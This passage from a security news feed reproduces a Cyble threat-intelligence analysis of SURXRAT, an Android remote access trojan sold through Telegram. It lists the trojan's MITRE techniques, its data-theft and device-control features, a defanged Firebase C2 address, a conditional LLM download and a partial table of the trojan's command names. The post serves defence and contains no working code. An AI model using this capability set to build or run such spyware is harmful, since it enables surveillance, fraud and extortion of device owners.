<td>Impair Defenses: Prevent Application Removal (<a href="https://attack.mitre.org/techniques/T1629/001/">T1629.001</a>)</td>
<td>Prevent uninstallation</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Obfuscated Files or Information (<a href="https://attack.mitre.org/techniques/T1406/">T1406</a>)</td>
<td>SURXRAT uses a Base64 encoding to encode the stolen files and send them to the Telegram Bot</td>
</tr>
<tr>
<td>Credential Access (<a href="https://attack.mitre.org/tactics/TA0031">TA0031</a>)</td>
<td>Access Notifications (<a href="https://attack.mitre.org/techniques/T1517/">T1517</a>)</td>
<td>SURXRAT collects device notifications</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>Software Discovery (<a href="https://attack.mitre.org/techniques/T1418/">T1418</a>)</td>
<td>SURXRAT collects the installed application list</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>System Information Discovery (<a href="https://attack.mitre.org/techniques/T1426/">T1426</a>)</td>
<td>SURXRAT collects the device information</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>System Network Connections Discovery (<a href="https://attack.mitre.org/techniques/T1421/">T1421</a>)</td>
<td>SURXRAT collects cell and wifi information</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>File and Directory Discovery (<a href="https://attack.mitre.org/techniques/T1420/">T1420</a>)</td>
<td>SURXRAT Enumerates external storage</td>
</tr>
<tr>
<td>Credential Access (<a href="https://attack.mitre.org/tactics/TA0031">TA0031</a>)</td>
<td>Clipboard Data (<a href="https://attack.mitre.org/techniques/T1414/">T1414</a>)</td>
<td>SURXRAT collects Clipboard Data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Audio Capture (<a href="https://attack.mitre.org/techniques/T1429/">T1429</a>)</td>
<td>SURXRAT can capture audio</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Data from Local System (<a href="https://attack.mitre.org/techniques/T1533/">T1533</a>)</td>
<td>SUXRAT collects files from external storage</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Location Tracking (<a href="https://attack.mitre.org/techniques/T1430/">T1430</a>)</td>
<td>SURXRAT Can collect location</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Call Log (<a href="https://attack.mitre.org/techniques/T1636/002/">T1636.002</a>)</td>
<td>SURXRAT Collects call log</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Contact List (<a href="https://attack.mitre.org/techniques/T1636/003/">T1636.003</a>)</td>
<td>Collects contact data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: SMS Messages (<a href="https://attack.mitre.org/techniques/T1636/004/">T1636.004</a>)</td>
<td>Collects SMS data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Accounts (<a href="https://attack.mitre.org/techniques/T1636/005/">T1636.005</a>)</td>
<td>SUXRAT collects Gmail account data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Video Capture (<a href="https://attack.mitre.org/techniques/T1512/">T1512</a>)</td>
<td>SURXRAT Captures photos using the device camera</td>
</tr>
<tr>
<td>Command and Control (<a href="https://attack.mitre.org/tactics/TA0037/">TA0037</a>)</td>
<td>Application Layer Protocol: Web Protocols (<a href="https://attack.mitre.org/techniques/T1437/001/">T1437.001</a>)</td>
<td>Malware uses HTTPs protocol</td>
</tr>
<tr>
<td>Exfiltration (<a href="https://attack.mitre.org/tactics/TA0036">TA0036</a>)</td>
<td>Exfiltration Over C2 Channel (<a href="https://attack.mitre.org/techniques/T1646/">T1646</a>)</td>
<td>SURXRAT sends collected data to the C&amp;C server</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>SMS Control (<a href="https://attack.mitre.org/techniques/T1582/">T1582</a>)</td>
<td>SURXRAT can send SMSs from the infected device</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Call Control (<a href="https://attack.mitre.org/techniques/T1616/">T1616</a>)</td>
<td>SURXRAT can make calls</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Data Destruction (<a href="https://attack.mitre.org/techniques/T1662/">T1662</a>)</td>
<td>Wipe external storage</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Indicators of Compromise (IOCs)</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The IOCs have been added to this <a href="https://github.com/CRIL-ThreatIntelligence/IOCs/blob/main/SURXRAT/Hashes.txt">GitHub </a>repository. Please review and integrate them into your <a href="https://cyble.com/knowledge-hub/what-is-a-threat-intelligence-feed/" target="_blank" rel="noreferrer noopener">Threat Intelligence feed</a> to enhance protection and improve your overall security posture.</p>
<p><!-- /wp:paragraph --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/surxrat-downloads-large-llm-module-from-hugging-face/">SURXRAT: From ArsinkRAT roots to LLM Module Downloads Signaling Capability Expansion</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SURXRAT: From ArsinkRAT roots to LLM Module Downloads Signaling Capability Expansion]]></title>
<description><![CDATA[Executive Summary




SURXRAT is an actively developed Android Remote Access Trojan (RAT) commercially distributed through a Telegram-based malware-as-a-service (MaaS) ecosystem under the SURXRAT V5 branding.


The malware is marketed using structured reseller and partner licensing tiers, allowin...]]></description>
<link>https://tsecurity.de/de/3346339/it-security-nachrichten/surxrat-from-arsinkrat-roots-to-llm-module-downloads-signaling-capability-expansion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3346339/it-security-nachrichten/surxrat-from-arsinkrat-roots-to-llm-module-downloads-signaling-capability-expansion/</guid>
<pubDate>Fri, 13 Mar 2026 12:40:06 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1200" height="600" src="https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="SURXRAT" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1.jpg 1200w, https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1-300x150.jpg 300w, https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1-1024x512.jpg 1024w, https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1-768x384.jpg 768w, https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1-600x300.jpg 600w" sizes="(max-width: 1200px) 100vw, 1200px" title="SURXRAT: From ArsinkRAT roots to LLM Module Downloads Signaling Capability Expansion 7"></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Executive Summary</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>SURXRAT is an actively developed Android Remote Access Trojan (RAT) commercially distributed through a Telegram-based malware-as-a-service (MaaS) ecosystem under the SURXRAT V5 branding.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The malware is marketed using structured reseller and partner licensing tiers, allowing affiliates to generate and distribute customized builds while the operator maintains centralized infrastructure and operational control.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This distribution model reflects the increasing professionalization of the Android threat landscape, where malware developers focus on scalability and monetization through affiliate-driven campaigns.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Technical analysis shows that SURXRAT operates as a full-featured surveillance and device-control platform capable of extensive data exfiltration, real-time remote command execution, and <a href="https://cyble.com/knowledge-hub/what-is-ransomware/">ransomware</a>-style device locking.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The <a href="https://cyble.com/knowledge-hub/what-is-malware/">malware</a> abuses accessibility permissions for persistent control and communicates with a Firebase-based command-and-control infrastructure to manage infected devices. Code similarities suggest that it evolved from the <a href="https://zimperium.com/blog/the-rise-of-arsink-rat">ArsinkRAT</a> family.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We have identified the latest samples that conditionally download a large LLM module, indicating experimentation with AI-assisted capabilities, device performance manipulation, and alternative monetization strategies alongside traditional surveillance and extortion activities.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>While it may not always be possible to avoid these threats entirely, prompt action can help reduce the impact of compromise. <a href="https://cyble.com/knowledge-hub/what-is-cyber-threat-intelligence/">Threat intelligence</a> tools such as Vision provide users with a real-time view of their digital threat landscape, alerting them to any compromise and enabling them to take corrective action.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Key Takeaways<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>SURXRAT is sold openly via Telegram, with reseller and partner licensing tiers, enabling scalable distribution through affiliate operators rather than centralized campaigns.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Source code references and functional overlap indicate SURXRAT likely evolved from ArsinkRAT, highlighting continued reuse and rapid enhancement of Android RAT frameworks.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The malware collects sensitive data, including SMS messages, contacts, call logs, device information, location data, and browser activity, enabling credential theft and financial fraud operations.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Use of Firebase Realtime Database infrastructure allows attackers to blend malicious communications with legitimate cloud traffic, improving reliability and complicating detection.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>SURXRAT conditionally downloads a large LLM module from external repositories, suggesting experimentation with AI-driven functionality, device performance manipulation, or evasion techniques.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The integrated ransomware-style screen locker enables attackers to deny device access and demand payment, allowing flexible monetization through surveillance, fraud, or extortion.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Overview<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Cyble Research and Intelligence Labs (CRIL) identified a new variant of <strong>SURXRAT</strong>, an actively developed Android Remote Access Trojan (RAT) being openly commercialized through a dedicated Telegram-based distribution ecosystem. Unlike opportunistic commodity malware, SURXRAT is positioned as a subscription-style cybercrime product, indicating an increasing level of professionalization in the Android malware-as-a-service (MaaS) landscape.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Indonesian threat actor (TA) operates a Telegram channel through which the malware is marketed, regularly updated, and distributed to resellers and partners. The channel was created in late 2024, suggesting that active malware development likely began in early 2025. At the time of analysis, we identified more than 180 related samples, indicating continuous development activity and demonstrating that the threat actor is actively maintaining and evolving the malware.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113395,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-1-%E2%80%93-SURXRAT-V5-advertisement-on-Telegram-Channel-1024x704.png" alt="Figure 1 – SURXRAT V5 advertisement on Telegram Channel" class="wp-image-113395"><figcaption class="wp-element-caption"><em>Figure 1 – SURXRAT V5 advertisement on Telegram Channel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The structured pricing tiers, operational announcements, and feature updates demonstrate a mature commercialization model similar to underground SaaS platforms, suggesting the operator is targeting aspiring <a href="https://cyble.com/knowledge-hub/who-is-a-cybercriminal/">cybercriminals</a> rather than conducting attacks directly.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>SURXRAT is marketed under a structured licensing scheme branded as SURXRAT V5, indicating active development and ongoing version iteration by the operator. The threat actor offers two primary purchase tiers within a “Ready Plan” model designed to attract both individual operators and larger resellers.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113398,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-2-%E2%80%93-Pricing-Plan-for-SURXRAT-posted-on-Telegram-channel-1024x707.png" alt="Figure 2 – Pricing Plan for SURXRAT posted on Telegram channel" class="wp-image-113398"><figcaption class="wp-element-caption"><em>Figure 2 – Pricing Plan for SURXRAT posted on Telegram channel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The Reseller Plan, advertised at a one-time payment of 200k, provides permanent access, allows buyers to generate up to three malware builds per day, includes free server upgrades, and permits users to create and sell SURXRAT builds while adhering to the operator’s predefined market pricing.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Partner Plan, priced at 500k as a permanent license, expands these capabilities by increasing the daily build limit to ten accounts, maintaining free server upgrades, and granting buyers the ability to establish their own reseller networks, effectively enabling further distribution.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Both tiers emphasize a one-time payment structure (“anti pt pt”), suggesting no recurring subscription fees. This tiered commercialization approach demonstrates the operator's deliberate attempt to scale malware adoption through affiliate-style distribution, decentralizing infection operations while retaining centralized control over infrastructure and ecosystem governance.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The threat actor periodically posts operational statistics to reinforce legitimacy and attract buyers. One such announcement revealed:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Bot Status: Active</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Total Users: 1,318 registered accounts within the system</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Operational confirmation timestamp: January 2026</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:image {"id":113399,"align":"center","style":{"color":[]}} --></p>
<figure class="wp-block-image aligncenter"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-3-%E2%80%93-Telegram-post-indicating-the-registered-accounts.png" alt="Figure 3 – Telegram post indicating the registered accounts" class="wp-image-113399"><figcaption class="wp-element-caption"><em>Figure 3 – Telegram post indicating the registered accounts</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>While these figures cannot be independently verified, public disclosure of user metrics is a common underground marketing tactic intended to establish credibility and demonstrate adoption among cybercriminal customers. If accurate, the numbers suggest a growing ecosystem of operators leveraging SURXRAT for Android surveillance and financial fraud operations.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>SURXRAT V5 provides a comprehensive surveillance and remote-control feature set consistent with modern Android RATs. The functionality indicates a strong emphasis on data harvesting, device monitoring, and full remote manipulation.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Data Collection and Surveillance Features</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The malware enables extensive extraction of sensitive user information, including:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>SMS monitoring</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Contact list and call logs</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>System information and installed applications</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Gmail account data</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Device location tracking</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Network and connectivity information</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Notification interception</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Clipboard monitoring</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Web browsing history</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Cellular tower intelligence</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>WiFi scanning and connection history</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Full file manager access</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>This level of visibility allows attackers to perform credential harvesting, OTP interception, profiling, and reconnaissance for secondary fraud operations.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Remote Device Control Capabilities</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>SURXRAT extends beyond passive surveillance by enabling attackers to manipulate compromised devices actively:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Remote device unlocking</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Triggering phone calls</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Wallpaper modification via remote URL</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Remote audio playback</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Network lag manipulation</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Push notification delivery</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Forced website opening</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Flashlight activation</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Device vibration control</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>On-screen text overlays</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Device locking using attacker-defined PIN</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Complete storage wipe functionality</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>During analysis of the SURXRAT sample, references to <strong>ArsinkRAT</strong> were found in the source code, suggesting a developmental relationship between the two malware families. In January 2026, Zimperium <a href="https://zimperium.com/blog/the-rise-of-arsink-rat">reported</a> an increase in activity associated with ArsinkRAT campaigns targeting Android devices.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A comparative analysis indicates notable functional and structural similarities between SURXRAT and ArsinkRAT, suggesting that the threat actor likely leveraged the ArsinkRAT source code. Using this foundation, an enhanced variant incorporating additional capabilities and updated features was subsequently developed.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113401,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-4-%E2%80%93-ArsinkRAT-string-mentioned-in-SURXRAT-malware-1024x460.png" alt="Figure 4 – ArsinkRAT string mentioned in SURXRAT malware" class="wp-image-113401"><figcaption class="wp-element-caption"><em>Figure 4 – ArsinkRAT string mentioned in SURXRAT malware</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>This evolution highlights how existing Android RAT frameworks continue to be repurposed and expanded by <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/cyber-threat-actor-and-types/" target="_blank" rel="noopener" title="What is a Cyber Threat Actor? Types of Threat Actors" data-wpil-keyword-link="linked" data-wpil-monitor-id="28346">threat actors</a>, accelerating malware development cycles and enabling rapid introduction of new surveillance and control functionalities.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>During our analysis of the latest SURXRAT variant, we identified a deliberate mechanism to manipulate network lag. The malware initiates the download of a large LLM module (&gt;23GB) hosted on Hugging Face. This approach is highly atypical for a mobile-based device.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Notably, this download is conditionally triggered when specific gaming applications are active on the victim’s device, namely <em>Free Fire MAX x JUJUTSU KAISEN</em> (com.dts.freefiremax) and <em>Free Fire x JUJUTSU KAISEN</em> (com.dts.freefireth), or when the malware receives alternative target package names dynamically from the threat actor–controlled server.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This indicates that the download behavior is remotely configurable, allowing operators to initiate the module retrieval based on applications specified through backend commands.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113403,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-5-%E2%80%93-Downloads-LLM-module-from-Hugging-Face-1024x521.png" alt="" class="wp-image-113403"><figcaption class="wp-element-caption"><em>Figure 5 – Downloads LLM module from Hugging Face</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>While downloading a model of this size on a mobile device may initially appear impractical, the observed behavior indicates intentional implementation rather than a misconfiguration. The LLM module appears to be under active development and may be leveraged to:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Deliberately introduce device or network latency during gameplay, potentially supporting paid cheating or disruption services<br>mask malicious background activity by degrading overall device performance, leading users to attribute abnormal behavior to system issues rather than malware<br>enable future AI-driven capabilities, such as automated interactions or adaptive social engineering techniques</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>The selective and conditional deployment of this module suggests that the threat actor is actively experimenting with AI-based components to enhance monetization strategies, improve evasion techniques, and expand operational capabilities.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Technical Analysis</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Upon execution, the malware prompts the victim to grant multiple high-risk permissions, including access to location services, contacts, SMS messages, and device storage.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Following initial permission approval, the malware displays additional prompts guiding the user to enable Accessibility Services. This commonly abused Android feature allows applications to monitor screen content and perform automated actions. The abuse of accessibility permissions significantly increases attacker control, enabling surveillance and facilitating further malicious operations without continuous user interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113407,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-6-%E2%80%93-Malware-prompting-to-enable-permissions.png" alt="Figure 6 – Malware prompting to enable permissions" class="wp-image-113407"><figcaption class="wp-element-caption"><em>Figure 6 – Malware prompting to enable permissions</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After acquiring the required permissions, SURXRAT establishes communication with a backend infrastructure hosted on a Firebase Realtime Database:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>hxxps://xrat-sisuriya-default-rtdb.firebaseio[.]com</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The malware connects using a database reference labeled “arsinkRAT,” further reinforcing the developmental linkage between SURXRAT and the previously observed ArsinkRAT malware family.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Once connectivity is established, the malware performs device registration by generating a random UUID, which serves as a unique identifier for tracking infected devices. Following registration, SURXRAT immediately begins exfiltrating sensitive information to the Firebase backend.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113408,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-7-%E2%80%93-Device-registration-1024x785.png" alt="Figure 7 – Device registration" class="wp-image-113408"><figcaption class="wp-element-caption"><em>Figure 7 – Device registration</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The malware collects and transmits a wide range of victim data, enabling comprehensive device profiling. Exfiltrated information includes:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Contact lists</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>SMS messages</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Call logs</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Device brand and model</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Android OS version</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Battery level and status</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>SIM card details</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Network information</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Public IP address</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>This dataset allows attackers to uniquely identify victims, monitor communications, and prepare follow-on fraud or surveillance activities such as OTP interception and account takeover.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After successful device registration, SURXRAT launches a persistent background service that maintains continuous communication with the Firebase command-and-control (C&amp;C) infrastructure and receives commands. The malware initializes multiple internal manager classes that handle surveillance, device control, and data collection.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113410,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-8-%E2%80%93-Background-service.png" alt="Figure 8 – Background service" class="wp-image-113410"><figcaption class="wp-element-caption"><em>Figure 8 – Background service</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The infected device periodically sends status updates to the backend while simultaneously polling for incoming commands issued by the operator. This near real-time synchronization enables attackers to execute actions on compromised devices remotely with minimal delay.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Analysis of command handlers revealed several instructions received from the Firebase backend that allow attackers to perform surveillance and active device manipulation:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Spy Command</strong>s</td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>accounts</td>
<td>Collects Google account information associated with the device</td>
</tr>
<tr>
<td>apps_list</td>
<td>Retrieves the list of installed applications</td>
</tr>
<tr>
<td>device_info</td>
<td>Collects detailed device metadata</td>
</tr>
<tr>
<td>audio_record</td>
<td>Records audio</td>
</tr>
<tr>
<td>file_list</td>
<td>Enumerates files and extracts metadata</td>
</tr>
<tr>
<td>flashlight</td>
<td>Remotely controls the device flashlight</td>
</tr>
<tr>
<td>camera_photo</td>
<td>Captures images using the device camera</td>
</tr>
<tr>
<td>contacts</td>
<td>Collects contacts</td>
</tr>
<tr>
<td>call_log</td>
<td>Collects call log</td>
</tr>
<tr>
<td>sms_read</td>
<td>Collects SMSs</td>
</tr>
<tr>
<td>Sms_send</td>
<td>Sends SMSs from the infected device</td>
</tr>
<tr>
<td>tts</td>
<td>Execute text to speech</td>
</tr>
<tr>
<td>call</td>
<td>Makes a call from the infected device</td>
</tr>
<tr>
<td>toast</td>
<td>Display a toast message</td>
</tr>
<tr>
<td>vibrate</td>
<td>Remotely vibrates the device</td>
</tr>
<tr>
<td>file_delete</td>
<td>Deletes file</td>
</tr>
<tr>
<td>location</td>
<td>Collects the victim’s location</td>
</tr>
<tr>
<td>file_upload</td>
<td>Sends file to the server</td>
</tr>
<tr>
